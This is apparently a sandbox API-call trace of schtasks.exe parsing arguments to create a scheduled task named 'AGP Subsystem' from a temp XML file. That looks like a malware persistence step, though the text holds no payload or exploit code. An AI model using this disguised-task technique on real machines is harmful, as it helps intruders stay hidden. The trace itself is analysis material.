[0169.574] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.574] lstrlenW (lpString="|?|") returned 3
[0169.574] lstrlenW (lpString="|tn|") returned 4
[0169.574] SetLastError (dwErrCode=0x490)
[0169.575] lstrlenW (lpString="create") returned 6
[0169.575] lstrlenW (lpString="create") returned 6
[0169.575] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.575] lstrlenW (lpString="tn") returned 2
[0169.575] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.575] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|create|") returned 8
[0169.575] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.575] lstrlenW (lpString="|create|") returned 8
[0169.575] lstrlenW (lpString="|tn|") returned 4
[0169.575] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0
[0169.575] SetLastError (dwErrCode=0x490)
[0169.575] lstrlenW (lpString="delete") returned 6
[0169.575] lstrlenW (lpString="delete") returned 6
[0169.575] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.575] lstrlenW (lpString="tn") returned 2
[0169.575] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.575] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|delete|") returned 8
[0169.575] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.575] lstrlenW (lpString="|delete|") returned 8
[0169.575] lstrlenW (lpString="|tn|") returned 4
[0169.575] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0
[0169.575] SetLastError (dwErrCode=0x490)
[0169.575] lstrlenW (lpString="query") returned 5
[0169.575] lstrlenW (lpString="query") returned 5
[0169.575] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.576] lstrlenW (lpString="tn") returned 2
[0169.576] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.576] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x8, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|query|") returned 7
[0169.576] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.576] lstrlenW (lpString="|query|") returned 7
[0169.576] lstrlenW (lpString="|tn|") returned 4
[0169.576] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0
[0169.576] SetLastError (dwErrCode=0x490)
[0169.576] lstrlenW (lpString="change") returned 6
[0169.576] lstrlenW (lpString="change") returned 6
[0169.576] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.576] lstrlenW (lpString="tn") returned 2
[0169.576] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.576] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|change|") returned 8
[0169.576] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.576] lstrlenW (lpString="|change|") returned 8
[0169.576] lstrlenW (lpString="|tn|") returned 4
[0169.576] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0
[0169.576] SetLastError (dwErrCode=0x490)
[0169.576] lstrlenW (lpString="run") returned 3
[0169.576] lstrlenW (lpString="run") returned 3
[0169.576] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.577] lstrlenW (lpString="tn") returned 2
[0169.577] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.577] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|run|") returned 5
[0169.577] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.577] lstrlenW (lpString="|run|") returned 5
[0169.577] lstrlenW (lpString="|tn|") returned 4
[0169.577] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0
[0169.577] SetLastError (dwErrCode=0x490)
[0169.577] lstrlenW (lpString="end") returned 3
[0169.577] lstrlenW (lpString="end") returned 3
[0169.577] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.577] lstrlenW (lpString="tn") returned 2
[0169.577] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.577] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|end|") returned 5
[0169.577] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.577] lstrlenW (lpString="|end|") returned 5
[0169.577] lstrlenW (lpString="|tn|") returned 4
[0169.577] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0
[0169.577] SetLastError (dwErrCode=0x490)
[0169.577] lstrlenW (lpString="showsid") returned 7
[0169.577] lstrlenW (lpString="showsid") returned 7
[0169.577] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.577] lstrlenW (lpString="tn") returned 2
[0169.578] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.578] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0xa, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|showsid|") returned 9
[0169.578] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.578] lstrlenW (lpString="|showsid|") returned 9
[0169.578] lstrlenW (lpString="|tn|") returned 4
[0169.578] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0
[0169.578] SetLastError (dwErrCode=0x490)
[0169.578] SetLastError (dwErrCode=0x490)
[0169.578] SetLastError (dwErrCode=0x0)
[0169.578] lstrlenW (lpString="/tn") returned 3
[0169.578] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0
[0169.578] SetLastError (dwErrCode=0x490)
[0169.578] SetLastError (dwErrCode=0x0)
[0169.578] lstrlenW (lpString="/tn") returned 3
[0169.578] GetProcessHeap () returned 0x2f0000
[0169.578] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x8) returned 0x306968
[0169.578] GetProcessHeap () returned 0x2f0000
[0169.578] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305358
[0169.578] SetLastError (dwErrCode=0x0)
[0169.578] SetLastError (dwErrCode=0x0)
[0169.578] lstrlenW (lpString="AGP Subsystem") returned 13
[0169.578] lstrlenW (lpString="-/") returned 2
[0169.578] StrChrIW (lpStart="-/", wMatch=0x41) returned 0x0
[0169.578] SetLastError (dwErrCode=0x490)
[0169.579] SetLastError (dwErrCode=0x490)
[0169.579] SetLastError (dwErrCode=0x0)
[0169.579] lstrlenW (lpString="AGP Subsystem") returned 13
[0169.579] StrChrIW (lpStart="AGP Subsystem", wMatch=0x3a) returned 0x0
[0169.579] SetLastError (dwErrCode=0x490)
[0169.579] SetLastError (dwErrCode=0x0)
[0169.579] lstrlenW (lpString="AGP Subsystem") returned 13
[0169.579] GetProcessHeap () returned 0x2f0000
[0169.579] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x1c) returned 0x303a80
[0169.579] GetProcessHeap () returned 0x2f0000
[0169.579] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305378
[0169.579] SetLastError (dwErrCode=0x0)
[0169.579] SetLastError (dwErrCode=0x0)
[0169.579] lstrlenW (lpString="/xml") returned 4
[0169.579] lstrlenW (lpString="-/") returned 2
[0169.579] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.579] lstrlenW (lpString="?") returned 1
[0169.579] lstrlenW (lpString="?") returned 1
[0169.579] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.579] lstrlenW (lpString="xml") returned 3
[0169.579] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.579] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|?|") returned 3
[0169.579] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.579] lstrlenW (lpString="|?|") returned 3
[0169.580] lstrlenW (lpString="|xml|") returned 5
[0169.580] SetLastError (dwErrCode=0x490)
[0169.580] lstrlenW (lpString="create") returned 6
[0169.580] lstrlenW (lpString="create") returned 6
[0169.580] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.580] lstrlenW (lpString="xml") returned 3
[0169.580] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.580] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|create|") returned 8
[0169.580] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.580] lstrlenW (lpString="|create|") returned 8
[0169.580] lstrlenW (lpString="|xml|") returned 5
[0169.580] StrStrIW (lpFirst="|create|", lpSrch="|xml|") returned 0x0
[0169.580] SetLastError (dwErrCode=0x490)
[0169.580] lstrlenW (lpString="delete") returned 6
[0169.580] lstrlenW (lpString="delete") returned 6
[0169.580] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.580] lstrlenW (lpString="xml") returned 3
[0169.580] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.580] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|delete|") returned 8
[0169.580] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.580] lstrlenW (lpString="|delete|") returned 8
[0169.580] lstrlenW (lpString="|xml|") returned 5
[0169.580] StrStrIW (lpFirst="|delete|", lpSrch="|xml|") returned 0x0
[0169.581] SetLastError (dwErrCode=0x490)
[0169.581] lstrlenW (lpString="query") returned 5
[0169.581] lstrlenW (lpString="query") returned 5
[0169.581] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.581] lstrlenW (lpString="xml") returned 3
[0169.581] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.581] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x8, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|query|") returned 7
[0169.581] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.581] lstrlenW (lpString="|query|") returned 7
[0169.581] lstrlenW (lpString="|xml|") returned 5
[0169.581] StrStrIW (lpFirst="|query|", lpSrch="|xml|") returned 0x0
[0169.581] SetLastError (dwErrCode=0x490)
[0169.581] lstrlenW (lpString="change") returned 6
[0169.581] lstrlenW (lpString="change") returned 6
[0169.581] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.581] lstrlenW (lpString="xml") returned 3
[0169.581] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.581] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|change|") returned 8
[0169.581] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.581] lstrlenW (lpString="|change|") returned 8
[0169.581] lstrlenW (lpString="|xml|") returned 5
[0169.581] StrStrIW (lpFirst="|change|", lpSrch="|xml|") returned 0x0
[0169.581] SetLastError (dwErrCode=0x490)
[0169.581] lstrlenW (lpString="run") returned 3
[0169.582] lstrlenW (lpString="run") returned 3
[0169.582] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.582] lstrlenW (lpString="xml") returned 3
[0169.582] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.582] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|run|") returned 5
[0169.582] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.582] lstrlenW (lpString="|run|") returned 5
[0169.582] lstrlenW (lpString="|xml|") returned 5
[0169.582] StrStrIW (lpFirst="|run|", lpSrch="|xml|") returned 0x0
[0169.582] SetLastError (dwErrCode=0x490)
[0169.582] lstrlenW (lpString="end") returned 3
[0169.582] lstrlenW (lpString="end") returned 3
[0169.582] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.582] lstrlenW (lpString="xml") returned 3
[0169.582] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.582] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|end|") returned 5
[0169.582] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.582] lstrlenW (lpString="|end|") returned 5
[0169.582] lstrlenW (lpString="|xml|") returned 5
[0169.582] StrStrIW (lpFirst="|end|", lpSrch="|xml|") returned 0x0
[0169.582] SetLastError (dwErrCode=0x490)
[0169.582] lstrlenW (lpString="showsid") returned 7
[0169.582] lstrlenW (lpString="showsid") returned 7
[0169.582] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.582] lstrlenW (lpString="xml") returned 3
[0169.583] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.583] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0xa, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|showsid|") returned 9
[0169.583] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.583] lstrlenW (lpString="|showsid|") returned 9
[0169.583] lstrlenW (lpString="|xml|") returned 5
[0169.583] StrStrIW (lpFirst="|showsid|", lpSrch="|xml|") returned 0x0
[0169.583] SetLastError (dwErrCode=0x490)
[0169.583] SetLastError (dwErrCode=0x490)
[0169.583] SetLastError (dwErrCode=0x0)
[0169.583] lstrlenW (lpString="/xml") returned 4
[0169.583] StrChrIW (lpStart="/xml", wMatch=0x3a) returned 0x0
[0169.583] SetLastError (dwErrCode=0x490)
[0169.583] SetLastError (dwErrCode=0x0)
[0169.583] lstrlenW (lpString="/xml") returned 4
[0169.583] GetProcessHeap () returned 0x2f0000
[0169.583] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0xa) returned 0x304cb0
[0169.583] GetProcessHeap () returned 0x2f0000
[0169.583] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305398
[0169.583] SetLastError (dwErrCode=0x0)
[0169.583] SetLastError (dwErrCode=0x0)
[0169.583] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.583] lstrlenW (lpString="-/") returned 2
[0169.583] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0169.583] SetLastError (dwErrCode=0x490)
[0169.583] SetLastError (dwErrCode=0x490)
[0169.583] SetLastError (dwErrCode=0x0)
[0169.584] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.584] StrChrIW (lpStart="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", wMatch=0x3a) returned=":\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp"
[0169.584] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304ce0
[0169.584] _memicmp (_Buf1=0x304ce0, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0xc) returned 0x304cf8
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304d10
[0169.584] _memicmp (_Buf1=0x304d10, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x68) returned 0x306978
[0169.584] SetLastError (dwErrCode=0x7a)
[0169.584] SetLastError (dwErrCode=0x0)
[0169.584] SetLastError (dwErrCode=0x0)
[0169.584] lstrlenW (lpString="C") returned 1
[0169.584] SetLastError (dwErrCode=0x490)
[0169.584] SetLastError (dwErrCode=0x0)
[0169.584] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x64) returned 0x3069e8
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3053b8
[0169.584] SetLastError (dwErrCode=0x0)
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306958) returned 1
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.585] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306958) returned 0x6
[0169.585] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306958 | out: hHeap=0x2f0000) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305318) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305318) returned 0x14
[0169.585] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305318 | out: hHeap=0x2f0000) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306968) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306968) returned 0x8
[0169.585] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306968 | out: hHeap=0x2f0000) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305358) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305358) returned 0x14
[0169.585] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305358 | out: hHeap=0x2f0000) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x303a80) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x303a80) returned 0x1c
[0169.585] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x303a80 | out: hHeap=0x2f0000) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305378) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305378) returned 0x14
[0169.586] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305378 | out: hHeap=0x2f0000) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cb0) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304cb0) returned 0xa
[0169.586] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cb0 | out: hHeap=0x2f0000) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305398) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305398) returned 0x14
[0169.586] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305398 | out: hHeap=0x2f0000) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3069e8) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3069e8) returned 0x64
[0169.587] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3069e8 | out: hHeap=0x2f0000) returned 1
[0169.587] GetProcessHeap () returned 0x2f0000
[0169.587] GetProcessHeap () returned 0x2f0000
[0169.587] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3053b8) returned 1
[0169.587] GetProcessHeap () returned 0x2f0000
[0169.587] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3053b8) returned 0x14
[0169.587] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3053b8 | out: hHeap=0x2f0000) returned 1
[0169.587] GetProcessHeap () returned 0x2f0000
[0169.587] GetProcessHeap () returned 0x2f0000
[0169.587] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2ff058) returned 1
[0169.587] GetProcessHeap () returned 0x2f0000
[0169.587] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2ff058) returned 0x10
[0169.587] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2ff058 | out: hHeap=0x2f0000) returned 1
[0169.588] SetLastError (dwErrCode=0x0)
[0169.588] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0169.588] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0169.588] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0169.588] VerifyVersionInfoW (in: lpVersionInformation=0x28cc3c, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x28cc3c) returned 1
[0169.588] SetLastError (dwErrCode=0x0)
[0169.588] lstrlenW (lpString="create") returned 6
[0169.588] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0
[0169.588] SetLastError (dwErrCode=0x490)
[0169.588] SetLastError (dwErrCode=0x0)
[0169.588] lstrlenW (lpString="create") returned 6
[0169.588] GetProcessHeap () returned 0x2f0000
[0169.588] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3053b8
[0169.588] GetProcessHeap () returned 0x2f0000
[0169.588] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x2ff058
[0169.588] _memicmp (_Buf1=0x2ff058, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.588] GetProcessHeap () returned 0x2f0000
[0169.588] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x16) returned 0x305398
[0169.588] SetLastError (dwErrCode=0x0)
[0169.589] _memicmp (_Buf1=0x304c08, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.589] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x305a80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0169.589] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0169.589] GetProcessHeap () returned 0x2f0000
[0169.589] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x74e) returned 0x305c90
[0169.589] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x305c90 | out: lpData=0x305c90) returned 1
[0169.589] VerQueryValueW (in: pBlock=0x305c90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28cd44, puLen=0x28cd48 | out: lplpBuffer=0x28cd44*=0x30602c, puLen=0x28cd48) returned 1
[0169.589] _memicmp (_Buf1=0x304c08, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.589] _vsnwprintf (in: _Buffer=0x305a80, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x28cd2c | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0169.589] VerQueryValueW (in: pBlock=0x305c90, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x28cd54, puLen=0x28cd50 | out: lplpBuffer=0x28cd54*=0x305e58, puLen=0x28cd50) returned 1
[0169.589] lstrlenW (lpString="schtasks.exe") returned 12
[0169.589] lstrlenW (lpString="schtasks.exe") returned 12
[0169.590] lstrlenW (lpString=".EXE") returned 4
[0169.590] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0169.590] lstrlenW (lpString="schtasks.exe") returned 12
[0169.590] lstrlenW (lpString=".EXE") returned 4
[0169.590] lstrlenW (lpString="schtasks") returned 8
[0169.590] lstrlenW (lpString="/create") returned 7
[0169.590] _memicmp (_Buf1=0x304c08, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.590] _vsnwprintf (in: _Buffer=0x305a80, _BufferCount=0x19, _Format="%s %s", _ArgList=0x28cd2c | out: _Buffer="schtasks /create") returned 16
[0169.590] _memicmp (_Buf1=0x304c68, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.590] GetProcessHeap () returned 0x2f0000
[0169.590] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305378
[0169.590] _memicmp (_Buf1=0x304c80, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.590] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x306718, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0169.590] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0169.590] GetProcessHeap () returned 0x2f0000
[0169.590] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x30) returned 0x3069e8
[0169.590] _vsnwprintf (in: _Buffer=0x306670, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x28cd30 | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37
[0169.590] GetProcessHeap () returned 0x2f0000
[0169.590] GetProcessHeap () returned 0x2f0000
[0169.590] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305c90) returned 1
